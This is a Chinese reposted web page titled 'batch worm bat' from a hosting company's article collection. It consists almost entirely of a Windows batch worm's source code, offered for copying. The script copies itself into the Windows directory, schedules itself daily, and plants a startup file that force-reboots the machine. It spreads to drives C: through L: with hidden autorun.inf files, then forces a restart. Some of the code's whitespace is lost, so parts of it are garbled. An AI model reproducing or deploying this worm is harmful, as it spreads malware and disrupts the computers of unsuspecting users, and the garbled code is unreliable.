批处理蠕虫bat
作者 佚名
来源 批处理
浏览
发布时间 2013-07-09
复制代码 代码如下: @echooff attrib-r-h-s"%~nx0"2>nul>nul attrib-r-h-s%windir%\"%~nx0"2>nul>nul copy"%~nx0"%windir%/y2>nul>nul at9:20/every:m,t,w,th,f,s,su"%windir%\%~nx0" echoreboot>%windir%\temp.dll setpat=「开始」菜单\程序\启动 echo@echooff>"%ALLUSERSPROFILE%\%pat%"\reboot.bat echoechoreboot^>^>%%windir%%\temp.dll>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat echofind/c"reboot"%%windir%%\temp.dll^|find"11">>"%ALLUSERSPROFILE%\%pat%"\reboot.bat echoiferrorlevel1gotorebootnow>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat echodel%%windir%%\user.dll/f/q>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat echodel%%windir%%\temp.dll/f/q>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat echodel/f/q"%%~nx0">>"%ALLUSERSPROFILE%\%pat%"\reboot.bat echoexit>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat echo:rebootnow>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat echoshutdown/r/t0/f>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat echoexit>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat echo[autorun]>%windir%\user.dll echoshellexecute=%~nx0>>%windir%\user.dll setdisk=C:>nul2>nul :auto copy%windir%\"%~nx0"%disk%\/y2>nul>nul copy%windir%\user.dll%disk%\autorun.inf/y2>nul>nul attrib+s+h+r%disk%\%~nx02>nul>nul attrib+s+h+r%disk%\autorun.inf2>nul>nul cls goto%disk%>nul2>nul :C: setdisk=D:>nul2>nul gotoauto>nul2>nul :D: setdisk=E:>nul2>nul gotoauto>nul2>nul :E: setdisk=F:>nul2>nul gotoauto>nul2>nul :F: setdisk=G:>nul2>nul gotoauto>nul2>nul :G: setdisk=H:>nul2>nul gotoauto>nul2>nul :H: setdisk=I:>nul2>nul gotoauto>nul2>nul :I: setdisk=J:>nul2>nul gotoauto>nul2>nul :J: setdisk=K:>nul2>nul gotoauto>nul2>nul :K: setdisk=L:>nul2>nul gotoauto>nul2>nul :L: cls attrib+s+h+r%windir%\%~nx02>nul>nul shutdown/r/t0/f exit |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
你可能对下面的文章感兴趣
关于批处理蠕虫bat的所有评论